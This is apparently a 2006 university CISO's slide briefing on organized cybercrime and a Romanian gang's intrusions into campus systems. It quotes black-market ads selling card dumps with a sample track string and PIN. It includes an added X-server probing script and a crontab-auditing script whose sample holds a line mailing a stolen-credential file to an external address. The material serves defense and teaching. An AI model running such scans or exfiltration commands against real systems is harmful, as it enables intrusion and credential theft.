Agora: A NETWORK OF TRUST
THREAT BRIEFING: ORGANIZED CYBERCRIME
KIRK BAILEY, CISSP, CISM
CHIEF INFORMATION SECURITY OFFICER, UNIVERSITY OF WASHINGTON
THE NEED FOR INTELLIGENCE TO DO THE JOB RIGHT
AS TECHNOLOGY SECURITY PROFESSIONALS, WE NEED TO KNOW WHO IS BEHIND ALL THE FRUSTRATING, MISERABLE AND HARMFUL STUFF… AND WHY.
“In the world of networked computers every sociopath is your neighbor.” - Dan Geer, Chief Scientist, Verdasys
OPEN SOURCE
LAW ENFORCEMENT AND “CULTIVATED” CONTACTS
White Papers & Reports
THE OLD WORLD OF ORGANIZED CRIME (CIRCA 1995)
1) CHINA (including Hong Kong and Taiwan): The six triads, also active within overseas Chinese communities. Engaged in drug trafficking, smuggling of illegal immigrants, arms dealing, vehicle theft, usury, illegal gambling, prostitution, pornography, and pirating of CDs, movies, and computer software.
2) COLOMBIA: The Medellín and Cali cartels. Engaged in the production and trafficking of cocaine and heroin, and in political corruption.
3) ITALY: The Sicilian Mafia or Cosa Nostra, the Calabrians, the Neapolitan Camorra, and the Sacra Corona Unita of Puglia. Also active in the Balkans, France, North and South America, Turkey, and Thailand. About 350 “families” engaged in drug trafficking and virtually all crimes.
4) JAPAN: The Yakuza or Boryokudan. Also active in Korea, Hawaii, California, and Australia. Engaged in drug trafficking, extortion, financial fraud, arms dealing, illegal gambling and usury.
5) MEXICO: The Juarez, Tijuana and Gulf cartels. Also active in the Southwest US. Engaged in drug trafficking, smuggling and corruption.
6) RUSSIA: The Russian and Caucasian Mafioso. Also active in Europe and North America. About 100 groups engaged in all crimes and political corruption.
7) TURKEY: About a dozen clans. Also active in Europe and Central Asia. Engaged in heroin production and trafficking, and extortion.
8) UNITED STATES and CANADA: The American Mafia or Cosa Nostra: 25 families in all types of crime and trade union corruption.
PROFILE OF TRADITIONAL ORGANIZED CRIME
[STRUCTURE]
[IDENTITY]
[ACTIVITIES]
[USE OF CORRUPTION]
[LEVEL OF TRANSBORDER OPERATIONS]
[SIZE]
[LEVEL OF VIOLENCE]
[PENETRATION INTO LEGITIMATE ECONOMY]
[POLITICAL INFLUENCE]
[COOPERATION WITH PEERS]
2004 TRADITIONAL ORGANIZED CRIME ESTIMATED ANNUAL DRUG-RELATED PROFITS: $105,000,000,000 (The U.S. Department of the Treasury, Office of Technical Assistance, and the UN Office on Drugs and Crime)
THE FRUSTRATING PROFILE OF ORGANIZED CYBERCRIME
[STRUCTURE] AMORPHOUS, IN THE ELECTRONIC ETHER.
[IDENTITY] ANONYMOUS, ASSUMED, DISGUISED, AND/OR ENCRYPTED.
[SIZE] UNKNOWN, BUT GROWING FAST: MILLIONS AND MILLIONS OF MACHINES.
[ACTIVITIES] FINANCIAL FRAUD, EXTORTION, IDENTITY THEFT, INFORMATION ESPIONAGE, AND COMPUTING AND BANDWIDTH THEFT.
[USE OF CORRUPTION] FINDS PROTECTION IN “SAFE HARBOR” NATIONS AND IN THE LACK OF USEFUL INTERNATIONAL LAW; SOME EVIDENCE OF BRIBES AND PAYOFFS.
[LEVEL OF TRANSBORDER OPERATIONS] VERY HIGH, BY DESIGN.
[LEVEL OF VIOLENCE] LITTLE, IF ANY.
[PENETRATION INTO LEGITIMATE ECONOMY] LITTLE.
[POLITICAL INFLUENCE] LITTLE.
[COOPERATION WITH PEERS] VERY HIGH.
CYBER ATTACK SOPHISTICATION EVOLVING RAPIDLY
[Figure: CERT chart (source: CERT 2004) plotting attack sophistication against intruder knowledge from 1980 to 2000+. As attack sophistication rises from low to high, the technical skill required of attackers falls. Techniques plotted, roughly chronologically: password guessing, self-replicating code, password cracking, exploiting known vulnerabilities, disabling audits, back doors, hijacking sessions, burglaries, network mgmt. diagnostics, sweepers, sniffers, packet spoofing, GUI tools, automated probes/scans, www attacks, denial of service, distributed attack tools, “stealth”/advanced scanning techniques, staged attack, cross-site scripting, bots, and highly advanced and well-financed tools and methods.]
RAPIDLY GROWING THREAT SPECTRUM
SERIOUS CRIMINALS ARE TAKING CONTROL OF BOTNETS AROUND THE WORLD AND IMPROVING HOW THEY COVER THEIR TRACKS AND FOIL INVESTIGATIONS.
CRIMINAL OPERATIONS ARE ACTIVELY FINANCING AND WORKING TO CONTROL MALWARE DEVELOPMENT.
THE NEW CRIMINAL ACTIVITIES AND INVESTMENTS ARE PRODUCING “CRIMEWARE” WITH BETTER TARGETING, PAYLOADS, AND DELIVERY SYSTEMS.
IT ALL MEANS THAT “ZERO DAY” EXPLOITS ARE MORE LIKELY, WITH EVEN WORSE IMPLICATIONS THAN IMAGINED BEFORE… “ALMOST INVISIBLE”
WHAT ARE THEY DOING?
[Figure: diagram contrasting the activities of traditional organized crime with those of organized cyber-crime (legend: = TRADITIONAL ORGANIZED CRIME, = ORGANIZED CYBER-CRIME). The diagram marks each activity as one or the other; the activities shown, in the order they appear, are: information theft & sales, credit fraud, electronic theft & fraud, “crimeware”, malicious code, technical exploits, botnets, spam, social engineering, stock fraud & share manipulation, fee scams, electronic extortion (DDoS), ID theft, porn, child porn, slavery, prostitution, human trafficking, illegal drugs, terrorism?, heroin, prescription drugs, extortion, illegal arms dealing, cocaine, marijuana, meth, money laundering & movement, industrial espionage, software piracy.]
GROWING GLOBAL NETWORKS OF ORGANIZED CRIME
“Shtirlitz”, CASH-OUT SCHEMER: Runs organized cash-out schemes associated with $30 - $90 million in annual fraud losses against American credit card holders.
Leo Kuvayev a.k.a. “BadCow”, SPAMMER: 34-year-old Russian native whose criminal enterprise includes what is considered one of the world’s largest spamming operations. Living in the U.S. until 5/11/05; now believed to be back in Russia. His estimated annual earnings are $30 million.
Roman Khoda, “My0”, DANGEROUS ATTACKER: Low-profile key player in building stealth capability for compromising systems for credit card information theft. A 26-year-old Russian with a degree in physics, My0 is considered a master of target reconnaissance. He orchestrates very well organized attacks with the objective of not being detected. He once rented apartments in Malta as a temporary base of operations for attacking just one target. Universities are a favorite target. Earnings: $? – but large.
Russians are the leaders of organized cyber-crime’s illicit website infrastructure for communications and markets. Closely associated with the following examples: ‘darkmarket.org’, ‘theftservices.com’, ‘carderplanet.com’, ‘vendersname.ws’, ‘cardingworld.cc’.
SAMPLING THE BLACK MARKET…
http://www.simplymexico.com/forums/read.php?12,56589,56779
http://www.webmasterforum.cc/forumdisplay.php?f=30
http://hackcrew.16.forumer.com/viewforum.php?f=12&sid=fd3822fbc5e8817a48629f2973cba3f4
http://www.forumsoftware.ca/viewForum.jsp?forum=7
http://www.atarihq.com/cgi-bin/cgf_showmsg.pl?2627
http://www.forumsoftware.ca/viewThread.jsp?forum=7&thread=8416
http://hackcrew.16.forumer.com/viewforum.php?f=6&sid=8974fcf893613cb89b52d61f78e5762e
SAMPLING THE BLACK MARKET…
DUMPS WITH PIN FOR SALE
We sell dumps + pin info. All dumps skimmed, you receive info in the following format:
4024212000614532=07041011103016103181
B4024212000614532^WOODWARD/MERRITT; PIN=9021
At now in stock we have only USA dumps + pin. If PIN invalid – we replace info. We don’t give dumps for test. You receive your dumps only after payment.
price for 1 dump = $300
Minimal order information: e-gold payments: $300; Western Union payments: $300
Contact information: icq 258-799, Email: firstname.lastname@example.org
We don’t sell atm skimmers! At now we have no europe dumps with pin.
http://www.ladyada.net/forums/viewtopic.php?p=6876&sid=59ea89a324df220b2ef330c59beceae1
Good Day to everyone who is in the same business as me. Just found your forum and I think I have quite a good service to offer if people are interested. I’m working only with serious people; please do not waste my and your time if you are not interested.
Selling Skimmers: selling skimmers for any banks in Europe and USA, all of the skimmers are home made, tested in UK and USA. Cost of 1 skimmer: 4000$ USA dollars. I have photos and examples to show if you are interested; leave your e-mail.
Selling Dumps + pin: selling Dump+pin, all of the dumps are getting checked for validity before I sell them. If there is something wrong with the dump I will replace it with no questions. Minimum order 5 dump+pin. 5-10 Dump+pin = 300$ each.
Also I have T1 tracks but without pins, some of them are with T2 but no pins; I sell them for 1-50 = 50$ each, 50-100 = 35$, more than 100 contact me.
Here or icq 194-8-194 or email@example.com me with any questions as well; I will answer all your questions.
Payment can be made by Western Union or dump+pin or egold or WM.
Many Thanks, looking forward to doing business with serious people.
Dimitry Ivanovich Golubov, 22-year-old Ukrainian
“His international ring is making millions trafficking in millions of stolen credit cards and financial information.” - U.S. Postal Inspection Service
THE TYMOSHENKO CONNECTION?
January 2006: Two senior Ukrainian politicians, including Vladimir Demekhin, Deputy Chairman of the Energy Committee of the Ukrainian Parliament, vouched for Golubov’s character in court. Golubov was released on bond on personal recognizance. Indications in monitored “carding community chat” suggest Golubov is back in business.
[Photo captions: Prime Minister Yulia Tymoshenko; Evgenia, Sean Carr]
Romanians are into online extortion… big time. In 2004 Romanian gangs successfully extorted an estimated $85 million from multiple online gambling sites outside of the U.S. in just 3 months’ time.
2004: Romanian gangs begin to tire of paying $200-$300 an hour to botnet operators and begin to create their own. (This contributes significantly to the rapid growth of criminal-funded malicious code, “crimeware.”)
2005: Romanians learn from the success of some of the Russian phishing groups and get into the business. They now have a significant share of the action, including credit card cash-out schemes.
2005 estimated annual revenues: $2 - $5 billion
2006 estimated annual revenues: $10 - $15 billion
ROMANIANS HAVE HAD A HISTORY OF NOT COLLABORATING MUCH WITH OTHERS OUTSIDE OF ROMANIA. THERE ARE SOME INDICATIONS THAT A COUPLE OF ROMANIAN GANGS HAVE WORKED WITH CODERS FROM SWITZERLAND AND THE U.S.
ROMANIAN CRIME GANG ATTACKS HIGHER EDUCATION
UW INCIDENT HISTORY (page 1)
2/23/06 - Detective Mark Kelly of the San Diego CATCH Team contacts the University of Washington with information about several compromised UW Unix systems. Kelly’s source: a sniffer log found on a compromised machine belonging to a company called “Expedient”, with HQ offices and data center in Pittsburgh, PA (regional offices around the country, including offices in San Francisco). It sells high-speed IP backbone infrastructure. The sniffer log was organized into several individual files, each named after an IP address belonging to the UW. The log files showed what appeared to be keystrokes captured from an X Windows session.
UW INCIDENT HISTORY (page 2)
Owners/administrators of the identified IP addresses were contacted to resolve the X Windows exposure. Devices were located in the Computer Science Department, Mathematics Department, and Applied Physics Laboratory.
2/28/06 - UW Security contacted by Gabe Laurence, a staff member of firstname.lastname@example.org. He is working with the S.D. CATCH Team investigating a string of attacks on UCSD systems (over 50 systems involved to date). Says they have identified a group of Romanians as being responsible. Alerted UW to threat specifics in case UW wanted to take additional steps in its response efforts. The UCSD systems were compromised after attackers scanned for open X servers (displays that accept connections without any authorization) and then attached to those X servers to listen for keystrokes, using old tools like “xspy”.
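How the “open X server” condition the attackers scanned for can be checked, as an added example that is not part of the briefing or of the UCSD/UW investigation: the script speaks only the first message of the X11 protocol, a connection setup request that carries no authorization protocol at all. A server that answers Success will let any host on the network attach to the display, which is what xspy-style keystroke sniffing depends on; a server with access control enabled answers Failed (typically “No protocol specified”) or Authenticate. The sample replies are constructed from the X protocol wire format; the probe function, the vendor string, port math and host names are assumptions for illustration.

```python
"""Probe a display for an X server that accepts unauthenticated TCP clients.

Added example, not code from the briefing. The X11 setup request carries no
authorization name or data; only a server with access control disabled will
answer Success to it.
"""
import socket
import struct

X11_BASE_PORT = 6000   # display :N listens on TCP 6000+N when TCP listening is enabled


def build_setup_request() -> bytes:
    """Little-endian setup request: major 11, minor 0, no auth name, no auth data (12 bytes)."""
    return struct.pack("<cxHHHHxx", b"l", 11, 0, 0, 0)


def parse_setup_reply(reply: bytes) -> dict:
    """Classify the server's setup reply.

    Byte 0 is the status: 0 Failed, 1 Success, 2 Authenticate. Only Success
    means the display is open to unauthenticated clients.
    """
    if len(reply) < 8:
        raise ValueError("truncated setup reply")
    status = reply[0]
    if status == 0:                                   # Failed: byte 1 = reason length, reason at 8
        reason_len = reply[1]
        major, minor = struct.unpack_from("<HH", reply, 2)
        reason = reply[8:8 + reason_len].decode("latin-1", "replace")
        return {"status": "failed", "open": False, "protocol": (major, minor), "reason": reason}
    if status == 2:                                   # Authenticate: bytes 6-7 = reason length / 4
        add_len = struct.unpack_from("<H", reply, 6)[0]
        reason = reply[8:8 + 4 * add_len].rstrip(b"\x00").decode("latin-1", "replace")
        return {"status": "authenticate", "open": False, "reason": reason}
    if status == 1:                                   # Success: fixed 32-byte body, vendor at 40
        major, minor = struct.unpack_from("<HH", reply, 2)
        result = {"status": "success", "open": True, "protocol": (major, minor),
                  "vendor": "", "screens": 0}
        if len(reply) >= 40:
            vendor_len, _max_request, screens = struct.unpack_from("<HHB", reply, 24)
            result["vendor"] = reply[40:40 + vendor_len].decode("latin-1", "replace")
            result["screens"] = screens
        return result
    raise ValueError(f"unknown setup status {status}")


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection during setup")
        buf += chunk
    return buf


def probe_display(host: str, display: int = 0, timeout: float = 3.0) -> dict:
    """Connect to host:display over TCP and classify the setup reply.

    Network code is not exercised offline; run it only against hosts you are
    authorized to test.
    """
    with socket.create_connection((host, X11_BASE_PORT + display), timeout=timeout) as sock:
        sock.sendall(build_setup_request())
        header = _recv_exact(sock, 8)
        add_len = struct.unpack_from("<H", header, 6)[0]   # same offset for all three statuses
        return parse_setup_reply(header + _recv_exact(sock, 4 * add_len))


# --- constructed sample replies (not captured traffic), laid out per the X protocol spec ---

def _constructed_failed_reply(reason: bytes) -> bytes:
    pad = (-len(reason)) % 4
    return struct.pack("<BBHHH", 0, len(reason), 11, 0, (len(reason) + pad) // 4) + reason + b"\x00" * pad


def _constructed_success_reply(vendor: bytes, screens: int = 1) -> bytes:
    pad = (-len(vendor)) % 4
    # release, resource-id base/mask, motion buffer, vendor len, max request len,
    # screens, formats, byte/bit order, scanline unit/pad, min/max keycode, 4 unused
    fixed = struct.pack("<IIIIHHBBBBBBBB4x", 12_000_000, 0x200000, 0x1FFFFF, 256,
                        len(vendor), 65535, screens, 0, 0, 0, 32, 32, 8, 255)
    add_len = 8 + (len(vendor) + pad) // 4       # 32 fixed bytes plus padded vendor, no screens
    return struct.pack("<BxHHH", 1, 11, 0, add_len) + fixed + vendor + b"\x00" * pad


SAMPLE_REFUSED_REPLY = _constructed_failed_reply(b"No protocol specified")
SAMPLE_OPEN_REPLY = _constructed_success_reply(b"The X.Org Foundation")


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        print(probe_display(sys.argv[1]))              # e.g. python probe.py 10.0.0.5
    else:
        print(parse_setup_reply(SAMPLE_REFUSED_REPLY))
        print(parse_setup_reply(SAMPLE_OPEN_REPLY))
```

A display that answers Success here is one that anyone on the network can attach to with xspy or a plain xwd/xev; the fixes are to keep the server off TCP entirely (the `-nolisten tcp` server option, the default on current X.Org builds) and to use per-user xauth cookies rather than `xhost +`.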
UW INCIDENT HISTORY (page 3)
Once they obtained user/password pairs, the Romanians would sometimes use that information to expand their access to other systems hosted on the UCSD network. The Romanians’ toolbox inventory for system compromise includes:
- psybnc (IRC proxy for UNIX systems)
- Mech bot (IRC bot kit)
UW incident response follow-up with APL provides evidence of the same activity on the compromised UW systems. Examination of a tar backup of one filesystem in APL shows that intruder downloads from 126.96.36.199 included the files ‘a.tgz’ and ‘new.zip.gz’. ‘a.tgz’ contained psybnc and Mech bot. ‘new.zip.gz’ contained files for an eBay phishing site that routed phish hits to ‘email@example.com’. Additionally, the trojaned ssh client used in the downloads wrote usernames and passwords to /usr/lib/+c0d.init. A daily cronjob mailed off the results of dsniff and the +c0d.init file to Taz_mania@email.ro.
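A hunt for the persistence and exfiltration pattern described above, as an added example that is not part of the briefing or of the UW response: it parses crontab text and flags jobs that pipe a file into a mailer bound for an external domain, that read a file whose name starts with “+” or “.” (the /usr/lib/+c0d.init trick), or that reference sniffer output. The crontab below is constructed for illustration; the “+c0d.init” path and the email.ro recipient mirror what the slide reports, and the local-domain list and the other jobs are assumptions.

```python
"""Hunt a crontab for the exfiltration pattern reported on the APL system:
a scheduled job that mails a credential drop file or sniffer output off-box.

Added example, not the briefing's code. SAMPLE_CRONTAB is constructed; only
the '+c0d.init' path and the email.ro recipient are taken from the slide.
"""
import re

# Constructed sample crontab: one routine job plus two modelled on the reported cronjob.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
30 2 * * * cat /usr/lib/+c0d.init | mail -s "daily" Taz_mania@email.ro
15 4 * * * tail -n 200 /tmp/.sniff/dsniff.log | /usr/sbin/sendmail someone@example.net
"""

# Assumed local domains; any other recipient domain counts as external.
LOCAL_DOMAINS = {"washington.edu", "uw.edu"}

MAILERS = {"mail", "mailx", "sendmail", "mutt"}
EMAIL_RE = re.compile(r"[\w.+-]+@([\w-]+(?:\.[\w-]+)+)")
# An absolute path whose last component starts with '+' or '.', e.g. /usr/lib/+c0d.init
ODD_PATH_RE = re.compile(r"(?:/[\w.+-]+)*/[+.][\w.+-]*")
SNIFFER_RE = re.compile(r"\b(?:dsniff|xspy|sniff)\b", re.IGNORECASE)


def parse_crontab(text: str) -> list:
    """Return (schedule, command) pairs from user-crontab text.

    Handles the five-field form and @reboot/@daily shortcuts; comments,
    blank lines and environment settings such as MAILTO=... are skipped.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            parts = line.split(None, 1)
            if len(parts) == 2:
                jobs.append((parts[0], parts[1]))
            continue
        parts = line.split(None, 5)
        if len(parts) < 6:
            continue
        jobs.append((" ".join(parts[:5]), parts[5]))
    return jobs


def audit_cron_jobs(text: str, local_domains=LOCAL_DOMAINS) -> list:
    """Flag jobs that mail externally, touch '+'/'.'-prefixed paths, or name a sniffer."""
    findings = []
    for schedule, command in parse_crontab(text):
        reasons = []
        words = re.findall(r"[^\s|;&()]+", command)
        uses_mailer = any(w.rsplit("/", 1)[-1] in MAILERS for w in words)
        external = [m.group(0) for m in EMAIL_RE.finditer(command)
                    if m.group(1).lower() not in local_domains]
        if uses_mailer and external:
            reasons.append("mails to external address: " + ", ".join(external))
        odd_paths = ODD_PATH_RE.findall(command)
        if odd_paths:
            reasons.append("reads '+' or '.'-prefixed path: " + ", ".join(odd_paths))
        if SNIFFER_RE.search(command):
            reasons.append("references sniffer output")
        if reasons:
            findings.append({"schedule": schedule, "command": command, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in audit_cron_jobs(SAMPLE_CRONTAB):
        print(hit["schedule"], hit["command"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

On a live host the same function can be fed the output of `crontab -l -u <user>` for every user plus the files under /etc/cron.d; the trojaned ssh client itself is caught by comparing the binary against the package manager’s recorded checksums, not by cron inspection.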
UW INCIDENT HISTORY (page 4)
The system administrator for UW APL had already wiped and reinstalled the operating systems, but a tar backup of one of the systems yielded additional evidence of interest:
- First intrusion appears to have been on 12/29/05, with root-level access lasting until 1/08/06.
- Logs show root access from the following sources:
Jan 8 08:51 - 188.8.131.52 (No DNS, Romanian, rdsnet.ro)
Jan 8 08:37 - 184.108.40.206 (No DNS, Romanian, rdsnet.ro)
Jan 8 08:07 - 220.127.116.11 (No DNS, Romanian, rdsnet.ro)
Jan 8 00:25 - 18.104.22.168 (No DNS, Romanian, rdsnet.ro)
Jan 7 04:29 - 22.214.171.124 (85_186_16_189.dbisoft.dnttm.ro)
Jan 7 04:11 - 126.96.36.199 (85_186_16_189.dbisoft.dnttm.ro)
Jan 4 05:13 - 188.8.131.52 (lily.earth.sinica.edu.tw)
Dec 29 04:36 - 184.108.40.206 (haydn.bio.sunysb.edu)
Dec 29 04:16 - 220.127.116.11 (bonnet.bio.sunysb.edu)
Dec 29 04:14 - 18.104.22.168 (donau.cs.upb.de)
UW INCIDENT HISTORY (page 5)
3/3/06 - UW Security receives reports that machines in the UW Mathematics Department are scanning outside networks. UW department system administrators were notified and the systems were scrubbed, patched, and brought back online. In looking at the machines it was clear that ‘xspy’ had been installed on them to keystroke-log other machines.
4/19/06 - UW Security is again contacted by Detective Mark Kelly of the S.D. CATCH Team. He forwards a copy of a computer file, discovered on a computer located on the UCLA network, that shows keystroke logging of a UW Medicine computer. He informs UW Security that the file is associated with the same Romanian cyber-gang. The UW Medicine machine is hosting a vendor-controlled system that cannot be patched or modified by UW system administrators. It is isolated from the network.
UW INCIDENT HISTORY (page 6)
UW technicians obtain an image of the system for forensic review. The complete and lengthy forensic review produces no evidence of any kind of compromise.
The UW CISO begins conversations with law enforcement officials, starting with Detective Kelly in S.D., to learn more about the threat. Requests for copies of any investigative reports or notes are denied by law enforcement because of the status of the case. Information from identified victim institutions is very difficult to obtain.
Compromised systems are used by the gang in several different ways, which reveals how they are making money and gives glimpses of how fast they are evolving. Machines are used as:
- X Windows keystroke logging and related file storage
- bot in DDoS attacks
- bot for spamming
- platform for scanning and compromising other systems
- host for counterfeit websites in phishing operations
UW INCIDENT HISTORY (page 7)
The UW CISO learns the following from a limited number of sources involved in related investigations:
1) This particular Romanian cyber-crime gang has been the subject of ongoing federal and international investigations for over 2 years.
2) Since 2004, there have been at least 3 separate FBI investigations initiated out of California, Utah, and Illinois.
3) The leading expert on the Romanians’ activities is a recently retired FBI agent in Illinois, Craig Adams.
4) Requests to have this designated as a major crime, for more resources and higher priority, have not been successful to date.
5) They are one of the most successful Romanian cyber gangs known (“huge amounts of money”).
UW INCIDENT HISTORY (page 8)
6) The Romanians are known to have compromised hundreds of networks and systems all over the world, including at least 50 institutions of higher education:
Rutgers
University of Southern California
University of California San Diego
University of California Los Angeles
University of California Berkeley
Stanford
California Polytechnic State University
Florida State University
Boston University
Purdue
Carnegie Mellon University
University of Chicago
Penn State
Syracuse University
University of Oregon
Louisiana State University
University of Colorado
University of Missouri
Missouri State University
University of Illinois
University of Delaware
University of Texas
Ohio University
Ohio State University
University of Kansas
University of Iowa
Rice
Utah State University
Harvard
UW INCIDENT HISTORY (page 9)
7) In addition, Detective Kelly stated that he knew of at least a hundred other university systems overseas that have been compromised by the same gang. He knew this because he has contacted all of them with sniffer file evidence like that he delivered to the UW. (All his evidence comes from the S.D. CATCH Team investigation of an initial compromise on the UCSD network.)
8) The Romanians’ targets are not limited to higher education. Other compromised organizations include NASA, JPL, Goddard Space Flight Center, and dozens of businesses large and small. The list is long.
9) Many of the institutions that have been contacted have not responded or did not seem to be interested when notified.
UW INCIDENT HISTORY (page 10)
10) Investigators indicate that the Romanians are constantly evolving their methods and the scope of their botnet operations. A worrisome addition to their methods is their limited adoption and “testing” of Tor. Law enforcement says the gang has used Tor onion routers in operations at Harvard and Ohio University.
11) Firewalls at UW Medicine continue to show attempts by machines from around the world to communicate with it:
- Universitaet Bremen, Germany
- Nantong Medicinal University, Jiangsu Province, China
- University of Notre Dame
ATTACK VECTOR NUMBERS AND OTHER WORRISOME FACTS
2,200,000 - UW’s CURRENT DAILY AVERAGE OF INCOMING SPAM EMAIL BLOCKED OR HANDLED. THIS REPRESENTS APPROXIMATELY 75% OF ALL INCOMING EMAIL PROCESSED THROUGH CENTRAL EMAIL SERVICES.
1,000,000 - UW’s current daily average of incoming emails detected with embedded malicious code. (source: C&C managed email filtering services)
180,000 - UW’s current daily average of detected and blocked attacks targeted at the UW, coming from locations all around the world. (source: TippingPoint filters)
10 - 120 MINUTES - TIME FOR AN UNPROTECTED MACHINE TO BE COMPROMISED ON THE UW BACKBONE
INDICATIONS OF HOW BAD THINGS ARE IN GENERAL:
ORGANIZED CYBERCRIME MAKES MORE MONEY OFF OF DATA THAN ORGANIZED CRIME MADE FROM DRUGS: $300 BILLION IN 2006?
$175 BILLION - ESTIMATED TOTAL REVENUE FOR E-COMMERCE WORLD-WIDE IN 2006 (Direct Marketing Association)
INDICATIONS OF HOW BAD:
80% OF WEB APPLICATIONS ARE VULNERABLE TO ATTACKS (WhiteHat Security, Inc.)
AVERAGE COMPUTER ON THE INTERNET IS ATTACKED EVERY 39 SECONDS - 2,244 TIMES A DAY (University of Maryland research)
80% OF HOME COMPUTERS ARE COMPROMISED WITH SPYWARE AND… (WhiteHat Security, Inc.)
7% OF COMPROMISED HOME COMPUTERS ARE BEING REMOTELY CONTROLLED AS PART OF A CRIMINAL BOTNET OPERATION. (WhiteHat Security, Inc.)
WE NEED GOOD INTELLIGENCE ABOUT OUR ADVERSARIES TO BUILD EFFECTIVE SECURITY STRATEGIES. PARTNERSHIPS AND SHARING INFORMATION HAVE NEVER BEEN MORE IMPORTANT.
THE IMMEDIATE FUTURE OF SECURITY IS LESS ABOUT TECHNOLOGY SOLUTIONS AND MORE ABOUT PEOPLE, AND ABOUT BEING STREET SMART AND FAST ON YOUR FEET. IF YOU THINK THE GOOD GUYS ARE GOING TO EVENTUALLY WIN THE TECHNOLOGY ARMS RACE, THINK AGAIN.
THE ADVERSARY IS EVOLVING STRATEGIES AND TACTICS THAT ARE BECOMING MORE EFFECTIVE AND STEALTHY. THEIR INCURSIONS ARE BECOMING ALMOST PARASITIC IN NATURE.
ARE WESTERN BUSINESS AND GOVERNMENT NETWORKS UNWITTINGLY BEING MERGED WITH CRIMINAL NETWORK OPERATIONS?
WOULD THIS REPRESENT OPPORTUNITIES FOR NEW INFORMATION ASSURANCE PRACTICES?
DOES THE DATA ITSELF OFFER OPPORTUNITIES FOR EFFECTIVE DEFENSIVE MEASURES?
SHOULDN’T WE BE WORKING ON OFFENSIVE ATTACK TOOLS LIKE THE ONES THE CYBER-CRIMINALS ARE BUILDING, TO MAYBE STAY AHEAD OF THEM?
THANK YOU